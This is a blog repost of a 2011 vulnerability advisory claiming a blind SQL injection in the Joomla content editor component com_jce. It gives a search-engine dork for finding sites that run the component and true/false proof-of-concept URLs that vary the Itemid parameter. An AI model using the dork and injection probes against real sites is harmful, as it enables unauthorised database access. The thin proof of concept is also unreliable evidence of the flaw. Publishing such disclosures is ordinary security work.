Saturday, April 9, 2011

joomlacontenteditor (com_jce) BLIND sql injection vulnerability

From: eidelweiss () windowslive com
Date: 8 Apr 2011 16:28:59 -0000

================================================
  joomlacontenteditor (com_jce) BLIND sql injection vulnerability
================================================
  
Software:   joomlacontenteditor (com_jce)
Vendor:     www.joomlacontenteditor.net
Vuln Type:  BLind SQL Injection
Download link:  http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
Dork:       inurl:"/index.php?option=com_jce"
  
  
References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html
  
  
==============================================================
Description:

JCE makes creating and editing Joomla!® content easy Add a set of tools to your 
Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS... 

==============================================================

    exploit & p0c
  
[!] index.php?option=com_jce&Itemid=[valid Itemid]
  
    Example p0c
  
[!] http://host/index.php?option=com_jce&Itemid=8    <= True
[!] http://host/index.php?option=com_jce&Itemid=-8   <= False
  
  
==============================================================
  
    Nothing Impossible In This World Even Nobody`s Perfect
  
==============================================================

0 comments:

Post a Comment